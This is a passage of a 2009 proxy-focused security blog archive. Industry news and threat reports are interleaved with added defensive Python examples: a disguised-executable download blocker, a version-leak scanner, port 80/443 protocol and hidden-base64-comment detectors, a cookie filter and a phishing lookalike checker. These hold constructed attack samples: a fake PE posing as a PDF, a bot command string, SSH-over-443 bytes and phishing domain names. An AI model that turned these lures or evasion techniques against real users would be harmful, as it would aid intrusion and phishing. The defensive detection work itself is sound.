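    if actual in EXECUTABLE_TYPES:
        return ("block", actual, "executable content")
    expected = EXPECTED_BY_EXT.get(ext)
    if expected is not None and expected != actual:
        return ("block", actual, "extension .%s does not match content" % ext)
    return ("allow", actual, "")


def _constructed_pe():
    """Minimal header that satisfies is_pe(); constructed, not a runnable program."""
    hdr = bytearray(0x44)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)   # e_lfanew -> 0x40
    hdr[0x40:0x44] = b"PE\x00\x00"
    return bytes(hdr)


# Constructed sample downloads.
SAMPLE_PDF = b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog >>\nendobj\n%%EOF\n"
SAMPLE_PE = _constructed_pe()
SAMPLE_ZIP = b"PK\x03\x04" + bytes(26)

if __name__ == "__main__":
    for name, blob in (("statement.pdf", SAMPLE_PDF),
                       ("statement.pdf", SAMPLE_PE),            # the lure: "PDF" that is an .exe
                       ("rejected_payment.pdf.exe", SAMPLE_PE),  # double extension
                       ("report.pdf", SAMPLE_ZIP)):
        print(name, download_verdict(name, blob))
```

The executable check runs before the extension comparison on purpose: a PE is blocked whether it calls itself `.pdf`, `.pdf.exe` or `.exe`, and the mismatch rule then catches the quieter cases such as an archive served under a document name.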
Friday, November 13, 2009
M86 E-Mail Security Program Blocks Messages with Malicious URLs
Security vendor M86 has enhanced its e-mail gateway security program. MailMarshal SMTP version 6.7 includes a blended threat module that blocks e-mails containing malicious URL links and uses a cloud-based malware behavior analysis service for rapid identification of new malicious links. The analysis service is actually an "interaction," as the company calls it, with the behavioral malware detection technology from Avinti, acquired by M86 earlier this year.
The new release also includes IP Reputation Service, which blocks incoming spam based on the sending IP address reputation to dramatically decrease bandwidth previously consumed by spam, and SpamBotCensor, which identifies and blocks bot-based spam.
"Blended threats are the most prominent malicious e-mail security threat to organizations today," said William Kilmer, chief marketing officer and former CEO of Avinti. "In fact, according to recent research from M86 Security Labs, blended e-mail threats have spiked to exceed 30 percent of all spam, about one in every three messages."
It's just another recognition that the threat vector is increasingly moving from email to the web. While email security remains important, the payload from viruses and malware is increasingly coming from web sources, making the proxy one of the most important tools in a security arsenal any organization should have.
Wednesday, November 11, 2009
War beneath the web
A new article in the Guardian talks about the state of website hacking.  Hacking websites used to be a way to show off. Now, it's a lucrative crime – committed on an industrial scale.
You can read the entire article here.
And here are some highlights from the article:
Experts agree that the change is due to one critical factor: money. Hackers generally don't now aim to make a mess; they do it to get cash.
"The difference is that in about 2003 people realised they could use these weaknesses to make money," explains Richard Clayton, a security researcher at Cambridge University. "There are three ways they do it: drive-by downloads, which enlarge a botnet [which can be hired to send spam, assist in the theft of personal details, or attack websites to extort their owners]; hosting a phishing site, so they can collect login details; and putting spam links on the site to raise the spam's search engine ranking." The hacking of Free Our Data and the other sites had the latter purpose.
...
Clayton and his team have done extensive research into phishing sites hosted on cracked web servers. "We found the same sites would get hacked. Our insight was that people were using Google to find websites to break into, by doing specific searches for particular versions of software that they knew had particular vulnerabilities – Wordpress 1.3.1 or Drupal or whatever. So they'd do a Google search, find those sites and then hack all 50 sites using the same method."
...
"It's a big problem and getting worse," says Dave Jevans, chief executive of IronKey and chair of the Anti-Phishing Working Group. "When I have tracked website attacks, I've found it convenient to look at the Zone-H statistics. Zone-H.org reports on website breach defacements, as reported by bragging hackers. The exact same attack methodologies are used to make a website host malware or a phishing site.
"Today they reported 1,110 defacements so far. For the month of October 2009 they reported 47,560. So that's about half a million defaced websites per year. Now keep in mind that this is reporting by hackers themselves. Imagine the number of sites that are attacked and breached that are not reported to Zone-H."
Sounds scary, but it shouldn't be news to a savvy IT administrator. All these points just reiterate the need for a proxy acting as a web security gateway in your network.
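Clayton's point above, that attackers search for sites advertising a specific vulnerable version, has a cheap defensive counterpart: find out what version strings your own site hands out before anyone else does. The following is an added Python example, not from the Guardian article or from any of the people quoted: it scans a page and its response headers for the usual disclosure points (the generator meta tag, `?ver=` cache-busting parameters on assets, and `Server` / `X-Powered-By` style headers) and can strip the meta tag. The sample page and headers are constructed; the header list and the regular expressions are assumptions that cover the common cases, not every way a version can leak.

```python
import re

# Places a site commonly leaks the exact software version attackers search for.
GENERATOR_RE = re.compile(
    r'''<meta\b[^>]*\bname=["']generator["'][^>]*\bcontent=["']([^"']+)["'][^>]*>''', re.I)
ASSET_VER_RE = re.compile(
    r'''<(?:script|link)\b[^>]*?(?:src|href)=["'][^"']*?[?&]ver=([0-9][\w.]*)''', re.I)
VERSION_HEADERS = ("Server", "X-Powered-By", "X-Generator")


def disclosed_versions(html, headers):
    """Return (where, value) pairs for every version string the page or its headers reveal."""
    found = []
    for m in GENERATOR_RE.finditer(html):
        found.append(("meta generator", m.group(1)))
    for m in ASSET_VER_RE.finditer(html):
        found.append(("asset ver=", m.group(1)))
    for name in VERSION_HEADERS:
        value = headers.get(name)
        if value and re.search(r"\d", value):   # a bare product name without a number is less useful to a dork
            found.append(("header " + name, value))
    return found


def strip_generator(html):
    """Remove the generator meta tag, the cheapest of the fixes."""
    return GENERATOR_RE.sub("", html)


# Constructed sample response from an imaginary, out-of-date blog.
SAMPLE_HEADERS = {"Server": "Apache/2.2.3 (CentOS)", "X-Powered-By": "PHP/5.2.6"}
SAMPLE_HTML = """<html><head>
<meta name="generator" content="WordPress 1.3.1" />
<link rel="stylesheet" href="/wp-content/themes/default/style.css?ver=1.3.1" />
<script src="/wp-includes/js/jquery.js?ver=1.3.2"></script>
</head><body><p>Hello</p></body></html>"""

if __name__ == "__main__":
    for where, value in disclosed_versions(SAMPLE_HTML, SAMPLE_HEADERS):
        print("%-18s %s" % (where, value))
```

Removing the strings only takes a site out of the search results; the point of the exercise is that each line the scan prints is a version you then have to go and patch.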
Tuesday, November 10, 2009
Rogue Anti-Spyware Targets Sesame Street's Big Bird
Most of you have seen by now that Google's search engine page features Sesame Street characters to honor the 40th anniversary of Sesame Street.  Google follows the news and trends of the world and honors significant events in its logo.  
Unfortunately, the idea of malware distributors abusing Google Trends is not new. The bad guys have once again demonstrated that they, too, can take advantage of Google Trends. This time their target is Sesame Street's birthday.
With the fortieth anniversary of Sesame Street, the bad guys have begun their attack. Searching for keywords such as Big Bird's birthday and Big Bird on Google displays pages with compromised sites.
More, with a video clip, at:
http://www.avertlabs.com/research/blog/index.php/2009/11/09/rogue-anti-spyware-targets-sesame-streets-big-bird/
Monday, November 9, 2009
Targeted attacks possible in the cloud, researchers warn
Network World reported last week that the use of virtualization by cloud service providers, who run virtual systems on servers shared by multiple customers, is opening up fresh data leak risks.
The article is based on a report by four researchers at MIT and the University of California at San Diego showing how vulnerabilities in cloud infrastructures could allow attackers to locate and eavesdrop on targeted virtual machines (VMs) anywhere in the cloud.
From the article:
The attack described in the report was conducted against Amazon's Elastic Compute Cloud (EC2) service. But the vulnerabilities that enable it are generic and would likely affect other cloud providers, said Eran Tromer, a post-doctoral researcher at MIT's Computer Science and Artificial Intelligence Laboratory and one of the authors of the report. The report is scheduled to be presented at the Association for Computing Machinery (ACM) Conference on Computer and Communications Security next month.
The research raises questions about a fundamental assumption about cloud computing which says that data hosted in a cloud is relatively safe from targeted attacks because it's hard to know where in the cloud the data is located. The research also comes at a time when concerns are high about security and privacy issues related to cloud computing.
This may be one more reason to reconsider that move to the cloud, or at least wait until better security can be devised for the cloud.
Thursday, November 5, 2009
Blue Coat Acquires S7
On Thursday, Blue Coat said it would acquire S7 Software, a services company based in Bangalore. Blue Coat is paying US$5.25 million in cash for the 65-person company.
S7 specializes in migrating applications from one platform to another. Blue Coat sells network security and performance monitoring appliances, but it is buying S7 because of the company's software development expertise.
Blue Coat also announced it is restructuring its business, and Blue Coat will shift an undisclosed number of engineering jobs from its Sunnyvale, California, and Austin, Texas, offices to S7's offices in Bangalore and other locations. With new hires and S7 additions, the company's total headcount reduction as part of the restructuring will be around 10 percent.
Wednesday, November 4, 2009
Welcome to Application Delivery 2.0
Network World last week published an article declaring that many IT organizations are entering a new era of application delivery, one that they refer to as Application Delivery 2.0. The challenges of the Application Delivery 2.0 era, it says, will be notably more complex than those of the current one.
First the background:
While ensuring acceptable application delivery has always been important, it historically was not a top of mind issue for most IT organizations. That changed a few years ago when IT organizations began to focus on ensuring acceptable application delivery. They did this by deploying a first generation of solutions that were intended to mitigate the impact of chatty protocols such as CIFS (Common Internet File System), to offload computationally intensive processing (for example TCP termination and multiplexing) off of servers, and to provide visibility into the performance of applications. Unfortunately, the IT organization of a few years ago typically approached application delivery from a tactical, stove-piped approach.
Hence, we are hesitant to use the phrase Application Delivery 2.0 as it sounds so much like just one more marketing cliché. However, we see distinct evidence, both from vendors and from IT organizations that we are indeed entering a second generation of application delivery.
Part of the characterization of Application Delivery 2.0 is that IT organizations are beginning to face a new set of challenges. That does not mean that the traditional challenges of supporting chatty protocols or maximizing the performance of servers have gone away. As is so often the case in our industry, IT organizations have to support traditional or legacy technologies and challenges at the same time that they have to respond to new technologies and challenges.
One of the new challenges facing IT organizations stems from the changing role of the mobile worker. A few years ago, there were relatively few mobile workers and the communications needs of the mobile workers of that era were satisfied with simple cell phones. That is no longer the case. Now it is common to have 25% or more of employees be mobile at any point in time. These employees have smartphones or other wireless devices that they routinely use to access business-critical applications. This introduces all of the performance and security issues associated with wireless networking into the mix of application delivery challenges.
While Network World seems to think we're entering a new era of Application Delivery, these issues seem to be the same ones we've already faced for some time now. Mobile workers don't sound like a new phenomenon to me, but maybe I'm missing something.
Tuesday, November 3, 2009
M86 Buys Finjan Security
M86 (formerly Marshal8e6 - the merger of Marshal and 8e6 Technologies) announced today the acquisition of Finjan Security, a web and email security vendor.  This latest deal confirms that the security industry consolidation continues.
Finjan brings to the table a secure Web gateway product and software-as-a-service solutions, M86 said in a statement. Under the merger, which is effective immediately, Finjan will maintain a development center and operations in Netanya, Israel.
The U.S.-based Finjan SW will remain an independent company to retain its malware detection intellectual property, according to a statement.
M86 was created a year ago with the merger of Marshal and 8e6. In March 2009, the combined company acquired behavioral malware detection company Avinti.
Last week, Cisco Systems said it was buying Web-based security software company ScanSafe. And earlier in October, Barracuda Networks, which makes security appliances, announced its purchase of Purewire, a Web security-as-a-service provider.
Meanwhile, vulnerability management provider Rapid7 recently acquired Metasploit, an open-source penetration testing framework and exploit database.
Friday, October 30, 2009
The Curse of Cloud Security
Lately there's been a lot of talk around the new buzzwords "cloud computing". We've even discussed the issue here on this blog in past articles. The immediate benefits of cloud computing are obvious: it lets you simplify your physical IT infrastructure and cut overhead costs. But the problem that keeps haunting us is that we've only started to see all of the security risks involved.
Network World tackles this topic this week and says:
Putting more of your infrastructure in the cloud has left you vulnerable to hackers who have redoubled efforts to launch denial-of-service attacks against the likes of Google, Yahoo and other Internet-based service providers. A massive Google outage earlier this year illustrates the kind of disruptions cloud-dependent businesses can suffer.
That's one of the big takeaways from the seventh-annual Global Information Security survey, which CSO and CIO magazines conducted with PricewaterhouseCoopers earlier this year. Some 7,200 business and technology executives worldwide responded from a variety of industries, including government, health care, financial services and retail.
Given the expense to maintain a physical IT infrastructure, the thought of replacing server rooms and haphazardly configured appliances with cloud services is simply too hard for many companies to resist. But rushing into the cloud without a security strategy is a recipe for risk. According to the survey, 43 percent of respondents are using cloud services such as software as a service or infrastructure as a service. Even more are investing in the virtualization technology that helps to enable cloud computing. Sixty-seven percent of respondents say they now use server, storage and other forms of IT asset virtualization. Among them, 48 percent actually believe their information security has improved, while 42 percent say their security is at about the same level. Only 10 percent say virtualization has created more security holes.
Security may well have improved for some, but experts like Chris Hoff, director of cloud and virtualization solutions at Cisco Systems, believe that both consumers and providers need to ensure they understand the risks associated with the technical, operational and organizational changes these technologies bring to bear.
The article is a good reminder to make sure you have all of your ducks in a row if you're going to consider cloud computing. Network World asks the difficult question:
When it went down, many companies that have come to rely on its cloud-based business applications (such as e-mail) were dead in the water. ...
"What if you have a breach and you need to leave the cloud? Can you get out if you have to?"
Thursday, October 29, 2009
Cyber Security Awareness
The Open Systems Journal web site is highlighting Cyber Security Awareness this month, and Day 25 of their efforts focused on security through ports 80 and 443, the ones used for web traffic.
As they remind us:
Port 80 and 443 are ports generally associated with the Internet. Port 443/HTTPS is the HTTP protocol over TLS/SSL. Port 80/HTTP is the World Wide Web. Let’s face it, port 80/443 are generally a given for being open on any type of filtering device allowing traffic outbound on your network. If web servers are being hosted, connections will be allowed inbound to those web servers. They are also two ports that pose a significant threat(s) to your network.
One reason for such a threat is the very fact that we just mentioned: everyone generally associates it with the Internet and web traffic and it's usually open. Sadly, it doesn't get watched that closely. I have heard the statement many times: it's just people surfing the web and we ignore it because there is too much traffic. The sad reality is that more often than not, the threat will come from people on your network surfing the web. The rise in browser based attacks is staggering to say the least.
For those that do want to watch it closely, that poses a challenge as well. How do you filter? What do you filter? How do you do analysis on the traffic? Let me pose an example to you. I looked at a piece of malware about three years ago that used base64 encoded html comments, on a very benign web page, to pass commands. How do you detect that? Some software automatically defaults to port 80 if the primary port is available.
The above two threats apply to port 80 and 443 traffic. Now, let's just focus on 443 for a minute. It's encrypted traffic, which means you can't read it. So what do you do? Unless you have a proxy on your network where you can inspect the traffic at that point, or run a host based IDS etc., your other network tools are blind to what is there.
Any serious IT admin concerned about security should already have the aforementioned proxy in their network. It provides a way to make sure only true HTTP traffic is passed through these ports (you can choose to block anything that's not actually HTTP). And even if you don't do this (you'd be surprised how many applications you break if you do), at least you'll have a record of all the traffic going through ports 80 and 443 for later audits. But seriously consider controlling more of the traffic through ports 80 and 443. The proxy will definitely help you do this.
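Two things the quoted post asks for, knowing that what crosses port 80 or 443 is really HTTP or TLS, and spotting commands hidden in base64-encoded HTML comments, can both be done at the proxy once it sees the cleartext. The following is an added Python example, not from the Cyber Security Awareness post or from any product: `classify_client_bytes` labels the first bytes a client sends as an HTTP request, a TLS ClientHello, or something else merely borrowing the port, and `hidden_base64_comments` pulls out HTML comments that are long, valid base64 decoding to mostly printable text, which is what a command string looks like and a random tracking token usually does not. The sample streams and page are constructed; the printable-ratio threshold is an assumption to tune on your own traffic.

```python
import base64
import re

HTTP_METHODS = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"DELETE ",
                b"OPTIONS ", b"CONNECT ", b"TRACE ", b"PATCH ")


def classify_client_bytes(first_bytes):
    """Label the opening bytes of a client connection on 80/443: 'http', 'tls' or 'other'."""
    request_line = first_bytes.split(b"\r\n", 1)[0]
    if request_line.startswith(HTTP_METHODS) and b" HTTP/1." in request_line:
        return "http"
    # TLS record header: type 0x16 (handshake), version 0x03 0x00..0x03,
    # two-byte length, then handshake type 0x01 (ClientHello).
    if (len(first_bytes) >= 6 and first_bytes[0] == 0x16 and first_bytes[1] == 0x03
            and first_bytes[2] <= 0x03 and first_bytes[5] == 0x01):
        return "tls"
    return "other"


COMMENT_RE = re.compile(rb"<!--(.*?)-->", re.S)
B64_RE = re.compile(rb"^[A-Za-z0-9+/]{16,}={0,2}$")


def hidden_base64_comments(html, min_printable=0.9):
    """Return (comment, decoded) pairs for comments that are long base64 decoding to mostly text.

    Cache busters and tracking ids tend to decode to binary junk and fail the
    printable-ratio test; an operator's command string passes it.
    """
    hits = []
    for m in COMMENT_RE.finditer(html):
        body = m.group(1).strip()
        if len(body) % 4 or not B64_RE.match(body):
            continue
        try:
            decoded = base64.b64decode(body, validate=True)
        except ValueError:
            continue
        printable = sum(32 <= c < 127 or c in (9, 10, 13) for c in decoded)
        if decoded and printable / len(decoded) >= min_printable:
            hits.append((body.decode("ascii"), decoded))
    return hits


# Constructed samples: three opening byte strings and one "benign" page.
SAMPLE_STREAMS = {
    "browser": b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n",
    "tls": b"\x16\x03\x01\x00\xf1\x01\x00\x00\xed\x03\x03" + bytes(32),
    "ssh_on_443": b"SSH-2.0-OpenSSH_5.3\r\n",      # tunnelling over the "always open" port
}
_C2_COMMAND = b"cmd:update;sleep:600"              # constructed bot command
SAMPLE_PAGE = (b"<html><body>\n"
               b"<!-- main navigation -->\n"
               b"<!-- " + base64.b64encode(_C2_COMMAND) + b" -->\n"
               b"<!-- " + base64.b64encode(bytes(range(48))) + b" -->\n"   # binary-looking token
               b"<p>Welcome</p></body></html>")

if __name__ == "__main__":
    for label, stream in SAMPLE_STREAMS.items():
        print(label, "->", classify_client_bytes(stream))
    for comment, decoded in hidden_base64_comments(SAMPLE_PAGE):
        print("hidden comment:", comment, "->", decoded)
```

The classifier only answers the question the post raises for port 80 and for the outer layer of 443; the comment scan is of use on 443 only after the proxy has terminated TLS and can read the page, which is the point the quoted author makes about being blind otherwise.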
Wednesday, October 28, 2009
Cookies sound sweet, but they can be risky
USA TODAY ran a story this week with the above title.  Catchy for the typical reader, but has so much more meaning when you're an IT manager.  For the uninitiated, everywhere you go on the Internet, you leave behind small footprints called cookies.
From the USA Today article:
Cookies track where you have gone online and are stored on your hard drive. The websites you visit tap into those cookies so they can tailor promotions to you or retrieve data such as your credit card information. Every site you visit also registers your numerical IP (Internet protocol) address and can track information associated with it. Your IP address contains information like your hometown, but not your name.
Cookies come in two types: first- and third-party. First-party cookies are kept only by the site you visit and any affiliated properties, such as the company's Facebook fan page. This information is not shared with other websites and is generally not considered worrisome. Third-party cookies are those shared across various websites; for example, if you click on certain ads or search for a car on sites that share such cookies, your information goes to a far larger audience.
USA Today does offer some advice to protect yourself when browsing the web:
• Check website privacy policies. Most sites state what information is gathered and how it is used. Some will let you opt in or opt out of the collection process. Check the policy especially if you plan to register on a site.
• Disable cookies. On your Web browser, you likely have an option to disable all cookies or those that apply to third-party uses. Disabling first-party cookies means websites won't likely have your credit card or password information stored anymore. Greve has disabled third-party cookies on her computer and "sleeps better at night" because of it, she says.
• Remove cookies regularly. You can set your browser to automatically clear your entire browsing history and cookies, or do it manually. But Greve says even though cookies are removed from the computer, "Once you put your information out, it's out there, and it's going to get to stores in one way, shape or form."
• Consider installing an "anonymizer." These services hide your IP address wherever you go, but Greve warns there have been "phishing" attacks — e-mails that try to get personal information — through some of these.
• Use a proxy server. These devices, which are intermediaries between networks, allow you to browse in private.
Of course that last recommendation is one I heartily endorse. Anyone managing a network should consider putting a proxy server in place to help protect the end-users browsing the web. In addition, make sure that proxy server is up to date on its URL database, real-time categorization, and malware scanning software.
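The first-party versus third-party distinction the article draws is something a proxy can enforce for every user behind it, not just those who change their browser settings. The added example below (not from the article or this post) classifies a response by comparing the site the user is on, taken from the Referer, with the host that is setting the cookie, and strips Set-Cookie only from third-party responses so logins and shopping carts keep working. Host names are constructed, and the registrable-domain rule is a simplification noted in the code.

```python
"""Proxy-side first-party vs third-party cookie classification.

Added example, not from the USA Today article or this post. Hosts are constructed.
"""
from typing import List, Tuple
from urllib.parse import urlsplit


def registrable_domain(host: str) -> str:
    """Site-level name used to decide which party a cookie belongs to.

    Assumption: the last two labels are the registrable domain. A real
    deployment would consult the Public Suffix List (co.uk and similar).
    """
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def cookie_party(page_url: str, request_url: str) -> str:
    """'first' when the request goes to the same site as the page the user is on
    (e.g. its own static-content host), 'third' when it goes to another site
    (ads, trackers). page_url is assumed to come from the Referer header."""
    page = registrable_domain(urlsplit(page_url).hostname or "")
    target = registrable_domain(urlsplit(request_url).hostname or "")
    return "first" if page == target else "third"


def filter_set_cookie(page_url: str, request_url: str,
                      headers: List[Tuple[str, str]],
                      block_third_party: bool = True) -> List[Tuple[str, str]]:
    """Strip Set-Cookie from third-party responses so the browser never stores
    them; first-party cookies (logins, carts) are passed through untouched."""
    if not block_third_party or cookie_party(page_url, request_url) == "first":
        return headers
    return [(k, v) for k, v in headers if k.lower() != "set-cookie"]


# Constructed sample: a news page loading its own script and an ad-network pixel.
PAGE = "https://news.example.com/story/1"
FIRST_PARTY = "https://static.example.com/app.js"
THIRD_PARTY = "https://ads.tracker-example.net/pixel.gif"
RESPONSE_HEADERS = [("Content-Type", "image/gif"), ("Set-Cookie", "uid=abc123; Path=/")]

if __name__ == "__main__":
    for url in (FIRST_PARTY, THIRD_PARTY):
        print(url, cookie_party(PAGE, url), filter_set_cookie(PAGE, url, RESPONSE_HEADERS))
```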
Tuesday, October 27, 2009
Cisco to Acquire SaaS Web Security Leader ScanSafe
This morning, Cisco announced its intention to purchase ScanSafe, a provider of SaaS Web Security.  It's another announcement in a string of acquisitions in the web security space, the most recent being Barracuda's announcement of its intention to purchase PureWire, another SaaS Web Security provider.
ScanSafe is based in London and San Francisco, and its Web security solutions are targeted at organizations ranging from global enterprises to small businesses.
From the announcement:
"With the acquisition of ScanSafe, Cisco is executing on our vision to build a borderless network security architecture that combines network and cloud-based services for advanced security enforcement," said Tom Gillis, vice president and general manager of Cisco's Security Technology Business Unit (STBU). "Cisco will provide customers the flexibility to choose the deployment model that best suits their organization and deliver anytime, anywhere protection against Web-based threats."
Web security is a large and expanding market expected to grow to $2.3 billion by 2012. By acquiring ScanSafe, Cisco is building on its successful acquisition of leading on-premise content security provider IronPort. The acquisition brings together the Cisco IronPort(TM) high-performance Web security appliance and ScanSafe's leading SaaS Web security service. This combination will expand Cisco's security portfolio to offer superior on-premise, hosted, and hybrid-hosted Web security solutions.
"ScanSafe pioneered the market for SaaS Web security and continues as a leader in this rapidly growing market," said ScanSafe CEO Eldar Tuvey. "At a time when enterprises are increasingly focused on a flexible and mobile workplace, the need for hybrid-hosted Web security solutions is greater than ever. By joining the Cisco team we will be able to offer even better and more flexible protection to our customers."
ScanSafe's service will be integrated with Cisco® AnyConnect VPN Client, the newest virtual private network (VPN) product from Cisco, to provide the industry's leading secure mobility solution. In addition, ScanSafe's global network of carrier-grade data centers and multi-tenant architecture will further enhance Cisco's ability to provide new cloud-security services for customers anywhere in the world.
Upon the close of the acquisition, the ScanSafe team will become part of Cisco's STBU, reporting to Gillis.
The ScanSafe acquisition demonstrates Cisco's commitment to security and its ability to use its financial strength to quickly capture key market transitions through its build, buy, and partner strategy. Under the terms of the agreement, Cisco will pay approximately $183 million in cash and retention-based incentives. The acquisition is subject to various standard closing conditions and is expected to close in the second quarter of Cisco's fiscal year 2010.
There's definitely more interest lately in Web Security, and I think you'll only see more in the acquisition arena, in addition to new offerings from various vendors. With malware being as prevalent in web pages as in email, this trend can only continue.
One Phishing Gang Dominates Attacks
Both PC World and Network World reported this week on a report released by the Anti-Phishing Working Group (APWG).  According to the APWG, a single group of attackers accounted for a quarter of all phishing in the first half of this year.
The group goes by the name Avalanche, and started work late last year and has been increasing its activity since. "This criminal operation is one of the most sophisticated and damaging on the Internet and targets vulnerable or non-responsive registrars and registries," the APWG report says.
From the PC World article:
The group attacks financial institutions, online services and job-search providers using fast-flux techniques that hide its actual attack sites behind an ever-changing group of proxy machines, mainly hacked consumer computers, according to APWG's latest Global Phishing Survey.
Rather than dying out after efforts to take down the Avalanche efforts, the gang seems to be increasing its efforts. "Avalanche attacks increased significantly in the third quarter of the year, and preliminary numbers indicate a possible doubling of attacks in the summer of 2009," the report says. The report period ends July 1, so the next report for the second half of this year will examine the apparent surge in detail.
Because the IP addresses that the attacks seem to be coming from are constantly shifting, notifying ISPs of the problem doesn't work. By the time the ISPs shut down the IP addresses the attack proxies have moved somewhere else, the report says.
The Avalanche gang registers domains at one to three registries or resellers and tests whether the registrars notice that they are registering domain names that are nearly identical. If not, they launch attacks from these domains, and if the registrar takes action against them, they just abandon the domains and move on.
An example of these similar domains is given in the report: 11fjfhi.com, 11fjhj.com, 11fjfh1.com, 11fjfhl.com. Each domain is used to launch up to 30 attacks, APWG says.
Avalanche attacks just one or two businesses at a time and frequently cycles back to re-attack older targets, the report says.
Because mitigation efforts by ISPs and others focused on Avalanche, the average lifetime of each Avalanche attack was significantly lower than the average for all attacks, the report says. The average uptime for all attacks was 39 hours, 11 minutes; for Avalanche attacks, it was 18 hours, 45 minutes, the study says.
APWG researchers consider an attack dead if it stays inactive for an hour. These attacks could be started up again after an hour, which would extend their longevity but would not be measured by the report, the researchers say. So the lifespan of Avalanche attacks may be longer than the report results indicate.
Malicious Domains Increase
In other study results, it appears that using hacked domains as launch pads for attacks is increasing. Some 14.5% of phishing attacks came from what APWG called malicious domains registered by phishers themselves. That is down from 18.5% in the second half of last year, the period for the group's previous Global Phishing Survey. "Virtually all the rest were hacked or "compromised" domains belonging to innocent site owners," the study says.
Of the malicious domains, 43% were launchpads for the Avalanche attack.
Two top level domains - .pe (Peru) and .th (Thailand) – score highest in a measure of how many second and third level domains within them are used to launch phishing attacks. The average score across all domains was 6.9, and .pe scored 20 while .th scored 16.
Overall, attacks came from 30,131 domains distributed among 171 top level domains. Half (50.3%) of these domains fell within the .com top level domain, 8.5% within .net and 5.6% within .org. The next three most often used top level domains were .eu, .ru and .de, all with less than 3%.
This new report from the APWG reminds us to make sure we've got some sort of protection against phishing sites in our proxy deployment. The short-lived nature of these domains also makes it important not to rely solely on URL databases, but to add some type of real-time categorization as well.
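One cheap real-time check that follows directly from the report is to look for the near-identical names the gang registers. The added example below (not from the APWG report or this post) consults the URL database first and, when a domain has no entry yet, compares its second-level label against phishing domains already seen; the seen list reuses the four names quoted from the report, and the database contents and other domains are constructed.

```python
"""Real-time lookalike check for domains a URL database has not seen yet.

Added example, not from the APWG report or this post. The seen-domain list is
the four near-identical names quoted from the report; the rest is constructed.
"""
from typing import Dict, List, Tuple


def levenshtein(a: str, b: str) -> int:
    """Edit distance (insert, delete, substitute) between two strings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def second_level(domain: str) -> str:
    """The label in front of the TLD, which is what the gang varies.
    Simplification: assumes a single-label TLD (no co.uk style suffixes)."""
    return domain.lower().rstrip(".").split(".")[-2]


def lookalikes(domain: str, seen_phishing: List[str], max_distance: int = 2) -> List[str]:
    """Seen phishing domains whose second-level label is within max_distance edits."""
    label = second_level(domain)
    return [s for s in seen_phishing if levenshtein(label, second_level(s)) <= max_distance]


def triage(domain: str, url_database: Dict[str, str],
           seen_phishing: List[str]) -> Tuple[str, str]:
    """URL database first; when it has no entry (the usual case for a domain
    that lives under 19 hours), fall back to the real-time lookalike heuristic."""
    verdict = url_database.get(domain.lower())
    if verdict is not None:
        return verdict, "url database"
    matches = lookalikes(domain, seen_phishing)
    if matches:
        return "block", "near-identical to " + ", ".join(matches)
    return "allow", "no database entry, no lookalike"


# Names quoted from the APWG report, used here as the cluster already seen.
SEEN_PHISHING = ["11fjfhi.com", "11fjhj.com", "11fjfh1.com", "11fjfhl.com"]
# Constructed URL database: one known-good site, one of the cluster already listed.
URL_DATABASE = {"www.example-bank.com": "allow", "11fjfhi.com": "block"}

if __name__ == "__main__":
    for d in ("11fjfhk.com", "11fjfhi.com", "www.example-bank.com", "example.com"):
        print(d, triage(d, URL_DATABASE, SEEN_PHISHING))
```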
Monday, October 26, 2009
Geocities set to close today
It's a sad day for many of us who've been around on the Internet for a long time.  Geocities is set to close today.  Started in 1994, it was the place for the masses to have their own website.  I remember getting my own page and email address at geocities in 1995.  I was lucky and early enough to get a short email address with just my name at the time.  
Somehow, Yahoo never figured out how to make any money from Geocities, even though the network is still among the top 200 most-trafficked sites on the Internet, according to metrics tracker Alexa. That alone should have given Yahoo some reason to keep the site and try to revive its usage, at least for ad content revenue.
But alas, that's not the case. For those of you still looking for Geocities content, you may be relieved that some of it will be saved at the Archive Team, where they've been busily rushing to save pages before today's deadline.
Friday, October 23, 2009
Schwarzenegger denies consumers knowledge of their own stolen data
I might have missed this bit of news if it hadn't been for a blog over at Sophos, the anti-virus provider.  Apparently last week, California Governor Arnold Schwarzenegger vetoed senate bill SB-20. The bill would have required businesses to inform consumers of what data about them was lost during a breach, inform the California Attorney General if more than 500 records were lost and provide advice to consumers on how to protect themselves from their data being exploited. It was passed by both the California Legislature and Senate without opposition.
More from Chester Wisniewski's blog:
The authors of the bill had worked closely with the insurance industry and other related parties to strike the right balance between protecting consumers and not placing an undue burden on businesses. Arnold disagrees, and claims to be looking out for businesses, yet those businesses had already dropped opposition to the legislation.
The Governator and I clearly don't see eye to eye on this one. I had my debit card "skimmed" a year ago from a local Automatic Teller Machine (ATM) in Vancouver. My bank dutifully notified me and asked me to come in for a replacement card. While speaking with the clerk at my local branch to retrieve my new card, I asked "Which ATM was it where my card was compromised, or was it a shop?" The response was "We don't disclose those details to customers."
Why not? I certainly do not want to make the mistake of returning to a merchant who may have been in on the scam. Consumers who are made aware of data loss have a right to know what personal information may have been obtained about them so they can protect themselves in the future.
I agree with Mr. Wisniewski: this should have been something the Governor signed, and I also agree it's surprising that the Governor vetoed this. With the widespread identity theft in the world today, you'd think this one would have been a no-brainer.
Thursday, October 22, 2009
Using Reverse Proxies for Front Ending Exchange
The Microsoft Exchange Team Blog wrote this week on the topic of Exchange 2010 (and 2007) Client Access Servers in the perimeter network, similar to the way "FE" (front end) servers are placed for Exchange 2000/2003.  Their recommendation?  Don't do it.
Instead the recommendation is to use reverse proxies. Their explanation:
Reverse Proxies are built to be put in the perimeter network or at the edge of the network. They include many security features and flexibility for customers to determine the level of defense-in-depth which is right in any particular environment.
If Microsoft recommended FE servers to be in the perimeter network for 2000/2003, what are the other reasons they've changed their stance for Exchange 2007 and 2010? Here's some of the more detailed rationale:
The E2000/E2003 FE servers were there to authenticate users and proxy traffic to the BE server where the traffic was actually interpreted and responded to. For example, the FE servers in E2000/E2003 don't do any Outlook Web Access (OWA) rendering. That all takes place on the BE servers.
The E2007/E2010 CAS role on the other hand contains all middle-tier logic and rendering code for processes like OWA, Exchange ActiveSync (EAS), Exchange Web Services (EWS), and more.
It looks like Microsoft is coming around to what we've known here all along, which is the proxy is still the best solution for securing web traffic coming into and out of the organization.
